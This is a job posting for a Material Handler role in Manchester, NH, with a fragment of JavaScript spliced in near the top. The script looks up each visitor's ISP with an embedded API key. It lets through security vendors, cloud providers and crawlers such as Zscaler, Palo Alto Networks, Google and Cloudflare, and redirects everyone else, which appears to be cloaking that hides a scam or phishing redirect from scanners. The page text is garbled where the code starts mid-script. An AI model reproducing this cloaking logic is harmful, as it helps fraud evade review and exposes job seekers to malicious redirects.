Material Handler – Day Shift
Overview
const ipAddress = data.ip;
// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;
// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));
if (!ispAllowed && !asOrgAllowed) {
// Redirect all users to the same URL
window.location.href = '';
}
})
.catch(error => {
console.error('Error retrieving ISP name:', error);
});
})
.catch(error => {
console.error('Error retrieving IP address or location:', error);
});
We are seeking a reliable Material Handler - Day Shift in Manchester, NH.
Responsibilities:
- Accurately receive, inspect, and document incoming materials and shipments.
- Organize and store materials efficiently in designated areas.
- Prepare and stage materials for production or shipment.
- Operate forklifts and other material handling equipment safely.
- Maintain a clean and organized work environment.
- Assist with inventory counts and cycle counting activities.
- Follow safety protocols and company policies at all times.
Skills Needed:
- Strong attention to detail and organizational skills.
- Ability to operate warehouse equipment safely.
- Good communication and teamwork skills.
- Physical stamina to lift and move materials regularly.
- Basic math and computer skills.
Benefits include: competitive wages, health insurance options, paid time off, and opportunities for growth. Join our team and contribute to efficient warehouse operations in a dynamic environment.